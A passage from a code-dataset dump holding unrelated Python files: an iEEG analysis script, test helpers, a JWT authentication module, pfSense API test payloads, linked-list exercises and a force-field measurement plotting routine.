\"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_bipolar_250.mat\"\npath_unity_events = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_unity.csv\"\npath_onset_events = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_onsets.csv\"\npath_montage = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_montage.csv\"\npath_montage_referenced = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_montage_referenced.csv\"\n\nFREQUENCY = 250\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/base_setup.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n# PICKS\npick_perhead_hip = mnehelp.picks_all_localised(raw_perhead_vr, pd_montage_referenced, 'Hi')\npick_perhead_hip_names = mne.pick_info(raw_perhead_vr.info, pick_perhead_hip)['ch_names']\npick_perhead_ent = mnehelp.picks_all_localised(raw_perhead_vr, pd_montage_referenced, 'Ent')\npick_perhead_ent_names = mne.pick_info(raw_perhead_vr.info, pick_perhead_ent)['ch_names']\npick_perhead_all = mnehelp.picks_all(raw_perhead_vr)\n\n# BAD EPOCHS\n#epochs_perhead_vr.plot(scalings = 'auto')\n\n#epochs_perhead_vr.plot(block = True, scalings = 'auto', picks=pick_perhead_hip)\n#epochs_perhead_vr.plot(block = True, scalings = 'auto')\n#mnehelp.get_dropped_epoch_indices(epochs_perhead_vr.drop_log)\nbad_epochs = [0, 1, 6, 8, 9, 10, 11, 12, 13, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 49, 50, 51, 52, 54, 55, 56, 57, 58, 59, 70, 71, 72, 73, 74, 76, 77, 78, 82, 83, 88, 89, 90, 91, 92, 93, 104, 105, 106, 107, 108, 109, 110, 117, 118, 119, 120, 121, 122, 123, 124, 127, 128, 129, 130, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 154, 155, 156, 157, 159, 160, 161, 162, 163, 164, 169, 170, 171, 172, 173, 174, 177, 178, 179, 180, 181, 182, 185, 186, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 213, 214, 215, 217, 218, 219, 220, 221, 222, 223, 233, 234, 236, 237, 238, 239, 240, 244, 245, 246, 247, 248, 249, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 287, 288, 289, 290, 291, 295, 296, 297, 298, 299, 300, 301, 302, 307, 308, 309, 310, 311, 315, 327, 328, 329, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346]\nepochs_perhead_vr.drop(bad_epochs)\n\n# TFR ANALYSIS ---------------\nfreqs = np.arange(2, 11, 1)\nn_cycles = 6\n\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/tfr_perhead_unity.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n## BASELINES ----------------\nonset_baseline = (-0.5, 0)\nbaseline = (-3, -2)\nmode = 'ratio'\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/baselines.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n### LFO BANDS\nlfo_bands = [[2, 4], [4, 9]]\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/lfo_collapse.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n###\nbox = mnehelp.custom_box_layout(pick_perhead_hip_names, 3)\nplot_pick_perhead_hip = range(len(pick_perhead_hip))\npower_stop_perhead_vr.plot_topo(picks = pick_perhead_hip, layout = box, baseline = (-3, -2))\n\n## POWER OVER TIME --------\n#Onsets\nmnehelp.plot_power_time([power_stop_perhead_vr_lfo, power_onset_perhead_vr_lfo], pick_perhead_hip, 0, event_names = ['stop', 'onset'], pick_names = pick_perhead_hip_names)\nmnehelp.plot_power_time_average ([power_stop_perhead_vr_lfo, power_onset_perhead_vr_lfo], pick_perhead_hip, 0, event_names = ['stop', 
'onset'])\n#point end\nmnehelp.plot_power_time([power_point_perhead_vr_ego_lfo, power_point_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'], pick_names = pick_perhead_hip_names)\nmnehelp.plot_power_time_average([power_point_perhead_vr_ego_lfo, power_point_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'])\nmneplothelp.plot_epochs_power(power_trial_point_perhead_vr_allo_lfo, 0, pick_perhead_hip_names)\n#point start\nmnehelp.plot_power_time([power_point_start_perhead_vr_ego_lfo, power_point_start_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'], pick_names = pick_perhead_hip_names)\nmnehelp.plot_power_time_average([power_point_start_perhead_vr_ego_lfo, power_point_start_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'])\n\n## STATISTICS -------------------\n# Pointing\nwilcox_allo_ego_lfo, wilcox_freqs_lfo = mnestats.wilcox_tfr_power(power_trial_point_perhead_vr_ego_lfo, power_trial_point_perhead_vr_allo_lfo, picks = pick_perhead_hip_names)\nmnestats.plot_wilcox_box(wilcox_allo_ego_lfo, FREQUENCY, pick_names = pick_perhead_hip_names)\n#pointing start\nwilcox_allo_ego_start_lfo, wilcox_freqs_lfo = mnestats.wilcox_tfr_power(power_trial_point_start_perhead_vr_ego_lfo, power_trial_point_start_perhead_vr_allo_lfo, picks = pick_perhead_hip_names)\nmnestats.plot_wilcox_box(wilcox_allo_ego_start_lfo, FREQUENCY, pick_names = pick_perhead_hip_names)\n# Onsets\nwilcox_stops_onsets_lfo, wilcox_freqs_lfo = mnestats.wilcox_tfr_power(power_trials_stop_perhead_vr_lfo, power_trials_onset_perhead_vr_lfo, picks = pick_perhead_hip_names)\nmnestats.plot_wilcox_box(wilcox_stops_onsets_lfo, FREQUENCY, pick_names = pick_perhead_hip_names)\n","sub_path":"patients/p142_Unity.py","file_name":"p142_Unity.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502370877","text":"from oscar.apps.product.models import ItemClass, Item\nfrom oscar.apps.partner.models import Partner, StockRecord\n\ndef create_product(price=None, title=\"Dummy title\", item_class=\"Dummy item class\", \n partner=\"Dummy partner\", upc=\"dummy_101\", num_in_stock=10):\n u\"\"\"\n Helper method for creating products that are used in tests.\n \"\"\"\n ic,_ = ItemClass._default_manager.get_or_create(name=item_class)\n item = Item._default_manager.create(title=title, item_class=ic, upc=upc)\n if price:\n partner,_ = Partner._default_manager.get_or_create(name=partner)\n sr = StockRecord._default_manager.create(product=item, partner=partner, \n price_excl_tax=price, num_in_stock=num_in_stock)\n return item","sub_path":"oscar/test/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568969804","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom book import Book\n\nclass PerseusWrapper:\n\n def __init__(self):\n self.BookURL = 'http://www.perseus.tufts.edu/hopper/collection?collection=Perseus%3Acorpus%3Aperseus%2CLatin%20Texts'\n\n def get_books(self): \n books = urlopen(self.BookURL)\n books = str(books.read())\n soup = BeautifulSoup(books, 'html.parser')\n links = soup.findAll(\"a\", { \"class\" : \"aResultsHeader\" })\n formatted_links = {}\n for link in links:\n formatted_links[link.get_text()] = link.get('href')[9:]\n return formatted_links\n\n def load_book(self,code):\n if 'Perseus' not in code:\n 
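# not a raw Perseus collection code, so resolve the human-readable title via the collection index\n 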
books = self.get_books()\n code = books[code] \n load = Book(code)\n return load\n\nx = PerseusWrapper()\nx.load_book('Aeneid')\n\n","sub_path":"Perseus/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396315956","text":"import json\nfrom typing import Optional\n\nfrom fastapi import Header, Depends\nfrom jose import jwt\n\nfrom util import abort\n\nAUTH0_DOMAIN = 'drdilyor.us.auth0.com'\nALGORITHMS = ['RS256']\nAPI_AUDIENCE = 'classroomapi'\n\njwks = json.load(open('auth.jwks.json', 'rb'))\n\n\nclass AuthError(Exception):\n \"\"\"A standardized way to communicate auth failure modes\"\"\"\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\ndef get_token_auth_header(authorization: Optional[str] = Header(None)):\n \"\"\"Obtains the Access Token from the Authorization Header\"\"\"\n auth = authorization\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected.'\n }, 401)\n\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, 401)\n\n elif len(parts) == 1:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, 401)\n\n elif len(parts) > 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, 401)\n\n token = parts[1]\n return token\n\n\ndef verify_decode_jwt(token):\n global jwks\n unverified_header = jwt.get_unverified_header(token)\n rsa_key = {}\n if 'kid' not in unverified_header:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization malformed.'\n }, 401)\n\n for key in jwks['keys']:\n if key['kid'] == unverified_header['kid']:\n rsa_key = {\n 'kty': key['kty'],\n 'kid': key['kid'],\n 'use': key['use'],\n 'n': key['n'],\n 'e': key['e']\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=ALGORITHMS,\n audience=API_AUDIENCE,\n issuer='https://' + AUTH0_DOMAIN + '/'\n )\n\n return payload\n\n except jwt.ExpiredSignatureError:\n raise AuthError({\n 'code': 'token_expired',\n 'description': 'Token expired.'\n }, 401)\n\n except jwt.JWTClaimsError:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Incorrect claims. 
Please check the audience and issuer.'\n }, 401)\n except Exception:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to parse authentication token.'\n }, 400)\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to find the appropriate key.'\n }, 400)\n\n\ndef requires_auth(permission=None):\n def requires_auth_dependency(token: str = Depends(get_token_auth_header)):\n payload = verify_decode_jwt(token)\n check_permissions(permission, payload)\n return payload\n\n return requires_auth_dependency\n\ndef check_permissions(permission, payload):\n if 'permissions' not in payload:\n abort(400)\n\n if permission is not None and permission not in payload['permissions']:\n abort(403)\n\n return True\n","sub_path":"backend/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"250362610","text":"# Copyright 2021 Jared Hendrickson\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unit_test_framework\n\nclass APIUnitTestInterface(unit_test_framework.APIUnitTest):\n url = \"/api/v1/interface\"\n get_payloads = [{}]\n post_payloads = [\n {\n \"if\": \"em2\",\n \"descr\": \"UNIT_TEST\",\n \"enable\": True,\n \"type\": \"staticv4\",\n \"type6\": \"staticv6\",\n \"ipaddr\": \"10.250.0.1\",\n \"ipaddrv6\": \"2001:0db8:85a3:0000:0000:8a2e:0370:7334\",\n \"subnet\": \"24\",\n \"subnetv6\": \"120\",\n \"blockbogons\": True\n }\n ]\n put_payloads = [\n {\n \"id\": \"em2\",\n \"descr\": \"UNIT_TEST_UPDATED\",\n \"enable\": False,\n \"type\": \"dhcp\",\n \"type6\": \"dhcp6\",\n \"blockbogons\": False,\n \"apply\": True\n }\n ]\n delete_payloads = [\n {\n \"if\": \"em2\"\n }\n ]\n\nAPIUnitTestInterface()","sub_path":"tests/test_api_v1_interface.py","file_name":"test_api_v1_interface.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267771125","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def rotateRight(self, head: ListNode, k: int) -> ListNode:\n if k == 0 or head is None:\n return head\n headNode = ListNode(0)\n headNode.next = head\n num, p = 0, headNode.next\n while p:\n num += 1\n p = p.next\n k = k % num\n pre, p = head, head\n count = 0\n while p:\n if count > k:\n pre = pre.next\n count += 1\n p = p.next\n q = headNode\n while pre.next:\n tmp = pre.next\n pre.next = tmp.next\n tmp.next = q.next\n q.next = tmp\n q = q.next\n return headNode.next\n","sub_path":"61_rotateRight.py","file_name":"61_rotateRight.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620531036","text":"from ds.node import Node\n\n\ndef find_cycle(n: Node) -> Node:\n slow = n\n fast = n\n while fast is not None and fast.next is not None:\n slow = slow.next\n fast = 
fast.next.next\n if fast == slow:\n # A collision has occurred\n break\n\n # If there is no collision, there is no cycle\n if fast is None or fast.next is None:\n return None\n\n # Send slow back to head; head and the meeting point are equidistant\n # from the cycle start, so stepping both one node at a time meets there\n slow = n\n while slow != fast:\n slow = slow.next\n fast = fast.next\n\n return slow\n","sub_path":"py-dna/exercises/linked_lists/two_6_iter.py","file_name":"two_6_iter.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266325095","text":"from tinydb import TinyDB, Query\r\ndb = TinyDB(\"db.json\")\r\n\r\ninsert_list = [{'patient_No':'03','row':0,'contents':'test sentence 0.','label':0},\r\n {'patient_No':'03','row':1,'contents':'test sentence 1.','label':1},\r\n {'patient_No':'05','row':0,'contents':'test sentence 2.','label':2}]\r\n\r\n#db.insert_multiple(insert_list)\r\n\r\nfor item in db:\r\n print(item)\r\n\r\nprint('label = 1')\r\nque = Query()\r\n\r\nfor item in db.search(que.label==1):\r\n print(item)\r\n\r\n# update\r\ndb.update({'label':5}, que.patient_No == '03')\r\n\r\nprint('after update')\r\n\r\nfor item in db.search(que.label==1):\r\n print(item)\r\n\r\nprint(db.all())\r\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533217818","text":"\nimport collections\nimport logging\nimport os\nimport pickle\n\nimport numpy as np\nimport simtk.unit\nimport matplotlib.pyplot as plt\n\nlogger = logging.getLogger(__name__)\n\n# conversion factor: 1 hartree = 627.509 kcal/mol (used for the QM energies below)\nhartree2kcalmol = 627.509474\n\ndef rms(x):\n # root-mean-square of an array of deviations\n return np.sqrt(np.mean(np.square(x)))\n\ndef flag_measurements(fname='bonds_N-C_deg-2.npz', mindb=None, groups=None, minfname='bonds_N-C_deg-2.minimum.npz', params={\"Mol\": {}, \"Bonds\": ['b1'], \"Angles\": [], \"ImproperTorsions\": [], \"ProperTorsions\": [], 'Energy': {}} ):\n \"\"\"\n energy is a list of keys to search for energy, example: {'oFF': 'vdW'}. Plotted energies are relative to the min value.\n \"\"\"\n d = None\n m = None\n rms_str=\"ffRMS(L)= {:9.4e} ffRMS(E)= {:9.4e} measL= {:9.4e} measRMS(L)= {:9.4e} measRMS(E)= {:9.4e} \"\n rms_str=\"{:9.4f} {:9.4f} {:9.4f} {:9.4f} {:9.4f} \"\n\n\n ene_str=\"{:s}: meanE= {:9.4f} RMS(E)= {:9.4f} maxAngEne= {:9.4f} {:9.4f}\"\n ene_maxdel_str=\"DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} maxGapAngEne {:9.4f} {:9.4f}\"\n ref_ene_key = 'qm'\n\n index = None\n if os.path.exists(\"index.txt\"):\n with open(\"index.txt\", 'r') as fid:\n index = dict([line.strip('\\n').split()[::-1] for line in fid.readlines()])\n elif os.path.exists(os.path.join(\"..\",\"index.txt\")):\n with open(os.path.join(\"..\",\"index.txt\"), 'r') as fid:\n index = dict([line.strip('\\n').split()[::-1] for line in fid.readlines()])\n if(os.path.exists(fname)):\n d = np.load(fname, allow_pickle=True)\n if(mindb is not None):\n m = mindb\n elif(os.path.exists(minfname)):\n if(minfname.split('.')[-1] == \"npz\"):\n m = np.load(minfname, allow_pickle=True)\n else:\n with open(minfname, \"rb\") as fid:\n m = dict(pickle.load(fid))\n if(m is None):\n return\n\n\n if(\"Mol\" not in params):\n params[\"Mol\"] = {}\n params_new = collections.defaultdict(list)\n params_new.update(params)\n params = params_new\n params_new = None\n measurements = [\"Bonds\", \"Angles\", \"ImproperTorsions\", \"ProperTorsions\", \"Energy\"]\n colors = ['red', 'blue', 'purple', 'green', 'orange', 'yellow']\n rows = 1\n hasbonds = int(len(params[\"Bonds\"]) > 0)\n hasangles = int(len(params[\"Angles\"]) + len(params[\"ImproperTorsions\"]) + len(params[\"ProperTorsions\"]) > 0)\n hasenergy = int(len(params[\"Energy\"]) > 0)\n rows = hasbonds + hasangles + hasenergy\n logger.debug(\"VAR: rows= \" + str(rows))\n\n mol_list = params['Mol']\n 
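# no molecules requested explicitly; default to every molecule in the minimized database\n 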
if(mol_list == {}):\n vals = list(m[\"mol_data\"].keys())\n mol_list = dict(zip(range(len(vals)), vals))\n\n param_list = [p for p_list in measurements for p in params[p_list]]\n ene_out_fname = (\"ene.\"+\"{:s}.\"*len(param_list)+\"txt\").format(*param_list)\n fid = open(ene_out_fname, 'w') ; fid.close()\n # this is looping through each molecule\n for jj, (name, smiles_list) in enumerate(mol_list.items()):\n print(\"{:4d} {:4d} {:64s}:\".format(jj,int(index[name]),name), end=\" \")\n hits=0\n\n fig = plt.figure(figsize=(8,4*rows),dpi=120)\n logger.debug(\"fig created id \" + str(id(fig)))\n ax_grid = [] #[[]]*rows\n for r in range(rows):\n logger.debug(\"Init row {} for axes\\n\".format(r))\n ax = [plt.subplot2grid((rows,3),(r,0), colspan=2, fig=fig)]\n ax.append(plt.subplot2grid((rows,3),(r,2), fig=fig, sharey=ax[0]))\n logger.debug(\"ax left {} ax right {}\\n\".format(id(ax[0]), id(ax[1])))\n ax_grid.append(ax)\n logger.debug(\"axes look like\\n{}\\n\".format(str(ax_grid)))\n checks = [[[\"Bonds\"], hasbonds], \\\n [[\"Angles\", \"ProperTorsions\", \"ImproperTorsions\"], hasangles],\\\n [[\"Energy\"], hasenergy]]\n present = 0\n plot_idx = {}\n for ncheck_i, check_i in enumerate(checks):\n if(check_i[1]):\n for param in check_i[0]:\n plot_idx[param] = present\n present += 1\n logger.debug(\"Will plot using {} axes\\n\".format(present))\n logger.debug(str(plot_idx))\n\n fig.subplots_adjust(wspace=.3, hspace=.2,right=.95)\n ddata = []\n mdata = {}\n mdatamean = {}\n lows = []\n\n #first is key\n #then is param vs data\n # then is 1xN for param data (choose 0)\n # then is param\n\n #oFF_labels = [c[0] for c in m.values()]\n used_labels = []\n c_idx = -1\n used_colors = {}\n bond_r0 = {}\n bond_k = {}\n bond_smirks = {}\n smiles_hits = []\n smiles_idx = []\n bond_dict = {}\n\n nonempty_ene = False\n # this is looping through each conformation of the molecule\n for ii,smiles in enumerate(smiles_list):\n all_params = []\n skip=False\n if(len(params[\"Energy\"].keys()) > 0):\n for ene_group in params[\"Energy\"]:\n if(\"energy\" not in m[\"mol_data\"][smiles]):\n logger.debug(\"SKIP 1\")\n skip=True\n break\n if(ene_group == 'qm'):\n if('qm' not in m[\"mol_data\"][smiles][\"energy\"]):\n logger.debug(\"SKIP 2\")\n skip=True\n break\n else:\n for ene_type in params[\"Energy\"][ene_group]:\n if(ene_type not in m[\"mol_data\"][smiles][\"energy\"][ene_group]):\n logger.debug(\"SKIP 3\")\n skip=True\n break\n if(skip): break\n if(skip): break\n if(skip): break\n for measure in measurements:\n if(measure == \"Energy\"):\n continue\n try:\n all_params += [p['oFF'] for p in m[\"mol_data\"][smiles][measure][\"indices\"].values()]\n except KeyError:\n print(\"Mol with smiles\", smiles, \"empty or corrupted (missing\", measure, \". 
Skipping\")\n skip=True\n break\n if(skip): break\n for param in params[measure]:\n if(not (param in all_params)):\n #print(smiles, \"Does not have\", param)\n skip=True\n break\n if(skip):\n continue\n #print(\"HIT!\")\n #try:\n #print(m[smiles].shape, end=\" \")\n #if(False and (not (d is None)) and smiles in d):\n if(0):\n for i,(j,jmin) in enumerate(zip(d[smiles][1].T[1:],m[smiles][1].T[1:])):\n label = m[smiles][0][0][i]['id']\n #print(ii, i, smiles, end=\" \")\n ax = subplot2grid((1,3),(0,0), colspan=2)\n ax.plot(d[smiles][1][:,0], j,'b.', ms=5)\n ax.plot(m[smiles][1][:,0], jmin, 'k.-', ms=7)\n ddata += list(j)\n mdata.setdefault(m[smiles][0][i], [])\n mdata[m[smiles][0][i]] += list(jmin)\n ax2.hist(j,bins=10, color='b', orientation='horizontal')\n ax2.hist(jmin,bins=10, color='k', orientation='horizontal')\n else:\n for measure_ii, measure in enumerate(measurements):\n logger.debug(\"VAR: measure= \" + str(measure))\n if(measure not in params):\n logger.debug(\"Not in params so skipping: \" + str(measure))\n continue\n if(len(params[measure]) == 0):\n logger.debug(\"Nothing in params for: \" + str(measure) + \" so skipping\")\n continue\n if(measure != \"Energy\"):\n for i,(index_key,index_dat) in enumerate(m[\"mol_data\"][smiles][measure][\"indices\"].items()):\n label = index_dat['oFF']\n #print(ii, i, smiles, jmin.mean(), end=\" \")\n plot_label=None\n if(not (label in params[measure])):\n logger.debug(\"This param not wanted so skipping: \" + str(label))\n #print(\"param\", label, \" not wanted. skipping\")\n continue\n logger.debug(\"Continuing to plot for : \" + str(label))\n hits += 1\n #print(index_key)\n if(not (smiles in smiles_hits)):\n smiles_hits.append(smiles)\n smiles_idx.append(ii)\n if(not (label in used_labels)):\n plot_label=label\n used_labels.append(label)\n c_idx += 1\n used_colors[label] = colors[c_idx]\n if( not ( label in [\"a0\", \"b0\", \"t0\", \"i0\"] )):\n if(measure == \"Bonds\"):\n bond_r0[label] = m['oFF'][label]['length']\n elif(measure == \"Angles\"):\n bond_r0[label] = m['oFF'][label]['angle']\n bond_smirks[label] = m['oFF'][label]['smirks']\n bond_dict[label] = m['oFF'][label]\n if( not (label[0] in 'ti')):\n bond_k[label] = m['oFF'][label]['k']\n \n color = used_colors[label]\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n measure_data = m[\"mol_data\"][smiles][measure][\"values\"][:,index_dat[\"column_idx\"]]\n #if(measure == \"Angles\"):\n # pass\n #measure_data *= np.pi/180\n #print(plot_idx, \"plotting\", label, \"td_ang=\", td_ang)\n\n if(td_ang[0] is not None):\n logger.debug(\"***PLOTTING {:s} to ax {:s} id {}\\n\".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0])))\n ax_grid[plot_idx[measure]][0].plot(td_ang, measure_data, lw=.1, ls='-', marker='.' 
, color=color, label=plot_label, ms=2)\n ax_grid[plot_idx[measure]][0].legend(loc='upper right')\n if(label not in mdata):\n mdata[label] = []\n mdata[label] += list(measure_data)\n\n mdatamean.setdefault(smiles, {})\n mdatamean[smiles].setdefault(label, [])\n mdatamean[smiles][label].append(measure_data.mean())\n else:\n for ene_group in params['Energy']:\n logger.debug(\"VAR: ene_group=\" + str(ene_group))\n if(ene_group == 'qm'):\n c_idx += 1\n used_colors[ene_group] = colors[c_idx]\n label = ene_group\n color = used_colors[label]\n ene = np.array(m[\"mol_data\"][smiles]['energy'][ene_group]) * hartree2kcalmol\n ene -= ene.min()\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n if(td_ang[0] is not None):\n logger.debug(\"plotting to idx\" + str(plot_idx[measure]) + \" for measure \" + str(measure) )\n logger.debug(\"***PLOTTING {:s} to ax {:s} id {}\\n\".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0])))\n ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label)\n ax_grid[plot_idx[measure]][0].set_ylabel(\"Energy (kcal/mol)\")\n nonempty_ene = True\n\n if(label not in mdata):\n mdata[label] = []\n mdata[label] += list(ene)\n\n mdatamean.setdefault(smiles, {})\n mdatamean[smiles].setdefault(label, [])\n mdatamean[smiles][label].append(ene.mean())\n else:\n logger.debug(\"VAR: ene_types=\" + str(list(params[\"Energy\"].keys())))\n for ene_type in params[\"Energy\"][ene_group]:\n logger.debug(\"VAR: ene_type=\" + str(ene_type))\n ene = m[\"mol_data\"][smiles]['energy'][ene_group][ene_type]\n if(len(ene) > 0 and isinstance(ene[0], simtk.unit.Quantity)):\n ene = np.array([x.value_in_unit(x.unit) for x in ene])\n ene -= ene.min()\n else:\n ene = np.array(ene)\n ene -= ene.min()\n label = \".\".join((ene_group, ene_type))\n c_idx += 1\n used_colors[label] = colors[c_idx % len(colors)]\n color = used_colors[label]\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n if(td_ang[0] is not None):\n logger.debug(\"plotting to idx \" + str(plot_idx[measure]) + \" for measure \" + str(measure) )\n ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label)\n ax_grid[plot_idx[measure]][0].set_ylabel(\"Energy (kcal/mol)\")\n nonempty_ene = True\n if(label not in mdata):\n mdata[label] = []\n mdata[label] += list(ene)\n\n mdatamean.setdefault(smiles, {})\n mdatamean[smiles].setdefault(label, [])\n mdatamean[smiles][label].append(ene.mean())\n if(nonempty_ene):\n ax_grid[plot_idx[measure]][0].legend(loc='upper left')\n #elif(jmin.mean() < 1.433):\n # print(\"Med:\", ii, k)\n #else:\n # print(\"High:\", ii, k)\n #print()\n\n #except TypeError:\n # print(\"TypeError\")\n #except IndexError:\n # print(\"IndexError\")\n title = str(dict([(k,v) for k,v in params.items() if (v != [] and k != \"Mol\")]))\n print(\"HITS= {:7.1f}\".format(hits/len(smiles_list)), end=\" \")\n for p in param_list:\n if( p in [\"a0\", \"b0\", \"i0\", \"t0\"] ):\n m['oFF'][p]['smirks'] = \"None\"\n logger.debug(\"hits or nonempty? 
\" + str(hits > 0 or nonempty_ene)) \n if(hits > 0 or nonempty_ene):\n smiles_idx_str = (\"{:s}.\"*len(smiles_idx)).format(*[str(x) for x in smiles_idx]) \n param_str = (\"{:s}.\"*len(param_list)).format(*[str(x) for x in param_list]) \n if(len(ddata) > 0):\n ax2.hist(ddata,bins=20, color='blue', orientation='horizontal')\n kT = (.001987*298.15)\n for ii,(label,dat) in enumerate(mdata.items()):\n #if(label[0] in \"ait\"):\n # #num *= np.pi/180\n # if(rows == 2):\n # plot_idx = 1\n # else:\n # plot_idx = 0\n plot_row = -1\n if(label[0] in \"ait\"):\n plot_row = plot_idx[\"Angles\"]\n elif(label[0] == \"b\"):\n plot_row = plot_idx[\"Bonds\"]\n else:\n plot_row = plot_idx[\"Energy\"]\n logger.debug(\"VAR: plot_row=\" + str(plot_row))\n color=used_colors[label]\n ax_grid[plot_row][1].hist(dat,bins=20, color=used_colors[label], histtype='step', orientation='horizontal')\n if( label in [\"a0\", \"b0\", \"t0\", \"i0\"] ):\n continue\n # TODO: calculate spread of torsions\n if(label[0] not in 'ab'):\n continue\n num = float(str(bond_r0[label]).split()[0])\n force_k = float(str(bond_k[label]).split()[0])\n delta = (2*(kT)/force_k)**.5\n if(label[0] in \"ait\"):\n delta *= 180/np.pi\n dat = np.array(dat)\n if((dat < (num - delta)).any() or (dat > (num + delta)).any()):\n print(label + \"= R\", end=\" \")\n elif(dat.max() < num or dat.min() > num):\n print(label + \"= Y\", end=\" \")\n else:\n print(label + \"= G\", end=\" \")\n ax_grid[plot_row][0].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color)\n ax_grid[plot_row][0].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n ax_grid[plot_row][0].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n ax_grid[plot_row][1].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color)\n ax_grid[plot_row][1].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n ax_grid[plot_row][1].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n \n #ax[0].legend()\n #if(rows > 1):\n # ax[1].legend()\n print_header = True\n smiles_out_fname = (\"mol.\" + str(index[smiles]) + \".smiles_with.\"+\"{:s}.\"*len(param_list)+\"txt\").format(*param_list)\n #if(os.path.exists(smiles_out_fname)):\n # print_header = False\n with open(smiles_out_fname, 'w') as fid:\n for measure in measurements:\n mol_label_count = 0\n for label in params[measure]:\n if((label not in bond_r0) ):\n continue\n label_count = 0\n #r0 = float(str(bond_r0[label]).split()[0])\n r0 = bond_r0[label] / bond_r0[label].unit\n force_k = bond_k[label] / bond_k[label].unit\n delta = 2*kT/force_k**.5\n smirks = bond_dict[label]['smirks']\n #delta *= 180/np.pi\n #pass\n if(measure in [\"Angles\", \"ImproperTorsions\", 